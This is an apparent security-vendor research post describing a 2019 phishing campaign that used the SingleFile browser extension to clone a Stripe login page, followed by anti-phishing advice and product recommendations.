by Samuel P Wang (Fraud Researcher)
The effectiveness of phishing makes it a permanent staple of a cybercrime. The concept behind phishing itself is simple — lure an unsuspecting victim to download a file or click a link by posing as something legitimate — but the strategies used by cybercriminals have become increasingly sophisticated. While doing a search for phishing pages with unique log-in characteristics, we came upon a phishing attack that involves using a legitimate tool called SingleFile as the obfuscation method to avoid detection.
SingleFile is a web extension for Google Chrome and Mozilla Firefox that allows users to save a webpage as a single HTML file. Although web browsers allow users to save pages as an “.htm” document, this often means multiple folders for the different files used in the webpage. By saving a page, required files and all, on a single HTML document, SingleFile streamlines the process, making it convenient for various use cases like archiving websites. However, its usefulness is not lost on threat actors, as we have found them abusing SingleFile to obfuscate phishing attacks.
Figure 1. Tool options for the Chrome version of SingleFile
We found samples that show cybercriminals using SingleFile to copy the log-in pages of legitimate websites as part of a phishing campaign. The method through which the log-in pages are generated is very simple:
- The attackers access the log-in page of the website that is to be spoofed (the payment processing website Stripe is used in the sample we found).
- They then use SingleFile to save and generate a file which contains the whole page, including any pictures (which will be saved as svg files).
Despite its simplicity, the spoofing method looks to be very effective, as it essentially generates an identical copy of the legitimate log-in page.
Figure 2. Comparison of the original Stripe log-in page (top) with the spoofed one based on the generated SingleFile page (bottom). The only noticeable difference is the URL.
Figure 3. Code showing images that are saved as .svg files with base64 encode
The attacks were fairly recent as the mail campaign started on February 27, 2019, with the sample we found saved by the attacker on February 10, 2019.
Note that while this entry demonstrates SingleFile being used for a malicious purpose, it has does not affect the extension’s security nor their users.
Recommendations and solutions
Both individuals and organizations can minimize the threat of this attack, and phishing in general, by adhering to standard best practices designed to fight phishing. These include the following:
- Any website that has an unusual URL is probably malicious, as most company websites carry their name or the name of one of their brands.
- Some threat actors create URLs that look similar to the URL of an official website. Therefore, users should double-check whether the website they’re visiting uses the correct URL. This can be accomplished by something as simple as querying a search engine.
- Users should avoid clicking on any links or downloading any files they receive via email unless they are absolutely certain that the sender is legitimate.
For a more comprehensive security suite, organizations can consider technology such as the Trend Micro™ Cloud App Security™ solution, which employs machine learning (ML) to perform web reputation and URL dynamic analysis. In addition, it can also detect suspicious content in the message body and attachments as well as provide sandbox malware analysis and document exploit detection.
Meanwhile, the Trend Micro™ Web Reputation Service can protect users from unique obfuscation methods such as the one we described. Web Reputation Service determines the credibility of web domains by assigning a reputation score based on factors such as age, historical location changes, and any indicators of suspicious activities discovered through malware behavior analysis. It then continues to scan sites and block users from accessing infected ones.
Indicators of Compromise (IoCs)
Updated on April 8, 2019 at 10:59 PM EST to fix a typographical error in the IoC URL